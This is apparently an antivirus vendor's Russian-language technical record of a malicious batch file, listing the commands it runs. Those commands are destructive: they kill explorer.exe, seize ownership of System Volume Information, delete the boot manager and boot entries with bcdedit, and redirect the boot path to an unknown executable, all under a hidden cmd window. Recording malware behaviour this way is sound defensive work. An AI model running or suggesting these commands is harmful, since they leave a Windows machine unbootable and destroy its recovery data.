Техническая информация
- '<SYSTEM32>\taskkill.exe' /f /im explorer.exe
- %TEMP%\5466.tmp\5467.tmp\5468.bat
- <Текущая директория>\minus.bat
- %TEMP%\5466.tmp\5467.tmp\5468.bat
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\5466.tmp\5467.tmp\5468.bat <Полный путь к файлу>" (со скрытым окном)
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\takeown.exe' /f "C:\System Volume Information" /r /d y
- '<SYSTEM32>\bcdedit.exe' /delete {bootmgr}
- '<SYSTEM32>\bcdedit.exe' /delete {default}
- '<SYSTEM32>\bcdedit.exe' /delete {current}
- '<SYSTEM32>\bcdedit.exe' /set {default} path \bladder.exe